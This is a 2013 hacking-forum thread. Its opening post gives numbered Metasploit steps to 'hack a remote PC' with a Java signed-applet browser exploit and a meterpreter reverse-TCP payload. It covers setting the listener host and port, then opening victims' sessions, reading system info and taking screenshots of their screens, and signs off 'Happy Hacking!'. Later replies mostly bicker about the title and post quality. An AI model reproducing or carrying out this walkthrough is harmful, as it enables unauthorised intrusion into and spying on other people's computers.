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Hack a Remote PC - Anonymous36 - 10-08-2013 1.Open Backtrack 5 R3 2.Open a new terminal 3.Start msfconsole 4.Now type in use exploit/multi/browser/java_signed_applet 5.Now type in set payload java/meterpreter/reverse_tcp 6.Open a new terminal and type ifconfig 7.Copy the inet addr(This is the local ip address of Backtrack) 8.Go back to the hacking terminal and type set lhost (the inet addr you copied) 9.Now type set lport 4444 10.At next type set srvport 80 11.Now type set uripath (some random name) 12.Now type set target 1 13.Set SSL 1 14.set appletname siteloader 15.set exitonsession false 16.setdisablepayloadhandler false (This is to make the session stable) 17.Now type in exploit 18.Now it would search for remote connections 19.When done type in sessions -i (these are the PC's it can connect to) 20. Check the ID's of the sessions 21.Type in sysinfo [ID] 21.Choose an ID and type sessions -i (the ID you choose) 22.Now you can type screenshot to see their screen ![]() ![]() ![]() ![]() ![]() Happy Hacking! RE: Hack a Remote PC Works on all OS - The Real Slim Shady - 10-08-2013 Please dont use misleading titles. Nothing works on all OS's and there are a number of components that need to be in place for this to be successful. Not to mention that this isnt an OS exploit... its a browser/java issue. RE: Hack a Remote PC - The Real Slim Shady - 10-10-2013 (10-10-2013, 04:47 AM)SilverChat Wrote: hmmmmmmm Dont waste peoples time. If you are going to post, post something useful. "wrong" doesnt provide any useful information to readers. Please explain what it is you believe is incorrect or dont post at all. thanks. RE: Hack a Remote PC - The Real Slim Shady - 10-10-2013 (10-10-2013, 04:47 AM)SilverChat Wrote: hmmmmmmm Dont waste peoples time. If you are going to post, post something useful. "wrong" doesnt provide any useful information to readers. Please explain what it is you believe is incorrect or dont post at all. thanks. RE: Hack a Remote PC - unnamed - 10-20-2013 (10-20-2013, 05:26 PM)abbas99 Wrote: i dont have BT5 i never used it. Backtrack is a linux distro and and it's also available for free to everyone. |